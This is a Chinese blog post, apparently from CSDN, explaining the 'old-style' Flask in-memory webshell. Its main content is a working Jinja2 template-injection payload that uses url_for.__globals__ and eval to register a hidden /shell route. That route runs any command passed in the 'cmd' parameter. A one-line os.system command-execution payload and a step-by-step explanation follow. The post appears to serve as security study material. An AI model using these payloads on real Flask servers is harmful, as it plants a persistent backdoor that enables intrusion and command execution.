flask内存马(老版)

最新推荐文章于 2024-11-01 20:44:26 发布
最新推荐文章于 2024-11-01 20:44:26 发布
阅读量445 收藏 2
点赞数 5
文章标签: flask linux 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wednis/article/details/140420498
版权

payload:

{{url_for.__globals__['__builtins__']['eval']("app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())",{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']})}}

1.利用flask的内置函数url_for.__globals__,可以获取该函数所在模块命名空间下的所有变量,其中包括__builtins__,自然就能利用python内置函数例如eval等
# 命令执行:{{url_for.__globals__['__builtins__']['eval']("__import__('os').system('cmd')")}}

2.找到eval后,执行了flask函数:app.add_url_rule,该函数可以自定义路由,及路由请求的处理函数
app.add_url_rule('/shell', 'shell', lambda :...)
定义了一个/shell路由,endpoint为shell(暂时可以不用理会),lambda则为一个处理路由的匿名函数
lambda:
__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())",{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']})
其中:
_request_ctx_stack是flask内部处理请求上下文的一个全局变量,用来区分不同请求的上下文环境,同时也是一个栈,top获取栈顶对象,再通过request.args.get可以获取栈顶对象的request对象的参数(按我理解栈顶对象应该就是请求上下文)
其中参数名为cmd,默认值为whoami,然后通过os.popen执行命令
// type(_requesr_ctx_stack) -> <class 'werkzeug.local.LocalStack'>

3.寻找eval执行代码的作用域
2的函数是eval(string, gloabl, local)中的第一个参数,而global就是string作用的作用域
在2中的函数中,需要用到两个实例,即app和_request_ctx_stack(这两个都是flask的全局变量)
所以沿用1中的url_for获取flask的web应用的全局变量,则作用域如下:
{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']}

ps:

from flask import url_for


for i in url_for.__globals__:
    if '_request_ctx_stack' in i:
        print(i)
    if 'current_app' in i:
        print(i)

# 可以知道两个都是在全局变量内的

wednis
关注
[Python]Flask内存学习
feng的博客
10-28 1543
前言 之前一直想学习的东西但是一直咕,终于选了个晚上在配置vscode调试PHP底层C代码的过程中卡住的时候去学了这个flask内存,也是很有意思。 前置知识 请求上下文 简单的flask的ssti肯定需要知道,这个就不提了。 首先就是跟着参考链接中的Flask上下文管理机制流程进行了一波学习,打断点跟进一波。 flask在接受到请求的时候会调用app的__call__方法: def __call__(self, environ, start_response): """The
Flask内存
Y4tacker的博客
03-30 959
文章目录前言前置知识app.add_url_rule()函数lambda表达式正文参考文章 前言 只是感觉比较好玩,索性简单学习了下,还蛮有意思 前置知识 app.add_url_rule()函数 一个简单的用法 app.add_url_rule('/index/',endpoint='index',view_func=index) add_url_rule三个参数解释: 第一个参数:函数对应的url规则,满足条件和app.route()的第一个参数一样,必须以’/'开始 endpoint:站点,就是在使
python-flask框架不出网反序列化解法(新版内存)
2301_80148821的博客
10-25 780
当网页请求进入Flask时, 会实例化一个Request Context. 在Python中分出了两种上下文: 请求上下文(request context)、应用上下文(session context). 一个请求上下文中封装了请求的信息, 而上下文的结构是运用了一个Stack的栈结构, 也就是说它拥有一个栈所拥有的全部特性. request context实例化后会被push到栈_request_ctx_stack中, 基于此特性便可以通过获取栈顶元素的方法来获取当前的请求.()或.pop()替换.
python内存学习
2301_79724395的博客
05-22 1400
重复的函数名将导致冲突,函数名已经被绑定到另一个函数对象上,所以不能成功注入。可以看到这里并没有对这个函数做check,而code_or_exception和f不就是之前的那两个参数吗,如果我们绕过上面的register_error_handler函数,对这里的函数进行控制,一样可以达到我们的目的。其次,def创建的函数是在解析时立即执行的,这导致在此类注入攻击场景下使用已存在的函数名,会在解析阶段就执行,而非等待触发该请求处理函数时执行,这会导致执行时刻不符合预期,有可能因此无法成功注入。
内存原理及查杀
m0_63081418的博客
08-13 1479
内存一些基本原理,大佬勿喷
游戏学笔记V0.2(持续更新)
欢迎!欢迎来到17号城市!
08-24 7144
文章目录游戏学什么是游戏游戏元素PlayersGoals and ObjectivesProceduresRulesResourcesConflictBoundariesOutcomes`游戏机制`游戏概念分类LudologySimulationNarratology交互性Interactivity系统的游戏设计Player Experience from Player ActionsDesign Counterparts(MDA)MechanicsDynamicsAestheticchallengeLog
android安卓源码海量项目合集打包-1
热门推荐
chenhao0568的专栏
06-11 13万+
下载地址 最后更新共计113个分类5177套源码29.2 GB。 卷 新加卷 的文件夹 PATH 列表 卷序列号为 00000200 5E7A:7F30 F:. ├─前台界面 │ ├─3D标签云卡片热门 │ │ Android TagCloudView云标签的灵活运用.rar │ │ Android 实现 标签 拖动 改变位置.rar │ │ android 流式布局和热门标签.zip │ │ ...
BIOS设置图解
guoliang
01-23 7090
BIOS设置图解之一 MSI H55 系列   2011-01-28 10:44:15|  分类: 其它|举报|字号 订阅 应为很多网友对BIOS还是 不太了解的,所以特地 转一些有用的帖子过来 方便大家参考 有用的朋友请看自己需求的部分,没用的朋友请不要抱怨帖子太长,光转帖我就花了半个小时呢  谢谢 其他型号H55主板BIOS设置与此类似,也可参考
c/c++成长之捷径
明月松间照,清泉石上流!
10-15 7213
c++成长之路不再迷茫!           不知不觉中进入计算机行业已有多个年头了,回首往事依然历历在目。今天我把我这段时间收集的书籍资料以及实例源码帖出来(部分资料太大了放不上去,理解下),与大家一起分享,我想其中的一些资料对大家会有帮助,并且我希望这些资料以及实例源码能对大家有一定的提升作用。帮助初学者快速进入VC++并且能融会贯通,那么我的目的也就达到了。 首先推荐的视频教
网页游戏FLASH插件Flash11.1.102.63(最好用的老版)
03-23
总的来说,"Flash11.1.102.63"因其稳定性、低资源占用以及与老款硬件的良好兼容性,成为了部分用户特别是网页游戏玩家心中的“最好用的老版”。然而,考虑到安全性,用户应谨慎评估继续使用此版本的利弊,或者寻求...
Flash 内存破解工具
05-26
强大的flash破解工具,内存提取资源,支持自定义数据加密标签破解。
flash内存修改器-flash内存修改器
11-10
《深入理解Flash内存修改器:探索游戏数据背后的秘密》 在数字娱乐领域,尤其是在网络游戏和电子游戏中,Flash内存修改器是一种被广泛使用的工具,它能够帮助玩家修改游戏内的数据,从而实现诸如增加生命值、无限...
fe 腾达W303R 64M内存 16flash.bin
01-10
fe 腾达W303R 64M内存 16flash.bin
使用 Flask 实现简单的登录注册功能
m0_65544927的博客
10-25 1483
本文介绍了如何使用 Flask 框架构建一个简单的用户登录和注册系统。首先,介绍了环境准备和数据库设置,包括使用 MySQL 创建数据库和用户表。接着,详细讲解了 Flask 应用的基本配置,特别是数据库连接的配置。 在实现部分,文章分别提供了用户注册和登录的路由代码,展示了如何处理表单输入、检查用户名是否已存在、密码的哈希处理,以及如何将新用户信息插入到数据库中。此外,还包含了如何验证用户登录信息,并在成功登录后重定向至主页的功能。 最后,文章还提供了简单的前端页面示例,帮助读者理解如何与后端进行交互
Python毕业设计-基于 Python flask 的前程无忧招聘可视化系统,Python大数据招聘爬虫可视化分析
Java徐师兄的博客
10-28 996
嗨喽,大家好,今天为大家带来的是Python 基于 flask 的前程无忧招聘可视化系统,Python大数据招聘爬虫可视化分析,该项目使用 flask框架,Mysql 数据库,request,selenium 框架进行爬虫,实现招聘数据的采集,清洗等,该项目总体来说还是挺不错的,界面美观,可用于 Python 毕业设计,Python 课程设计,下面针对这个项目做具体介绍。基于Python flask和Mysql的前程无忧招聘可视化系统。
软件测试学习笔记丨Flask操作数据库-ORM
ceshiren_com的博客
11-01 1080
是把数据保存到可永久保存的存储设备中(比如磁盘)。持久化的主要应用是将内存中的数据存储在关系型数据库中,当然也可以存储在磁盘文件中、xml数据文件中等。
Flask
欢迎来到秦朝
10-30 256
Pycharm社区版没有自动创建这几个文件,手动创建即可。
使用Flask构建RESTful API
最新发布
qq_36287830的博客
11-01 417
Flask是一个用Python编写的轻量级Web应用框架。它没有固定的数据库抽象层、表单验证工具等,因此非常灵活,适合快速开发。在`routes.py`中定义路由。users = [# 导入蓝图在models.py中定义数据库模型。return {通过本文,你已经学习了如何使用Flask构建RESTful API。我们介绍了Flask的基本概念、环境搭建、项目结构、路由定义、请求处理、响应格式化、错误处理、数据库集成、测试等内容。
python 实现了一个简单的五子棋游戏
huanghm88的专栏
10-29 207
图形界面:使用graphics库创建了一个五子棋游戏的窗口,包含棋盘、显示信息(如先后手、游戏提示、上一步落子信息)以及重新开始和退出按钮等。游戏逻辑:实现了五子棋的基本规则,包括判断落子是否合法、是否形成五子连珠、禁手规则(简单实现),以及使用博弈树算法实现AI的决策过程。交互功能:支持玩家与AI交替下棋,玩家通过鼠标点击下棋,同时可以重新开始游戏或退出游戏。
Flash平台内存优化技术指南
以下是基于标题和描述中提及的“flash内存优化”和“性能”标签的一些关键知识点: 1. **对象生命周期管理**:在Flash中,有效地管理对象的创建和销毁可以避免内存泄漏。及时释放不再使用的对象,尤其是大对象,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值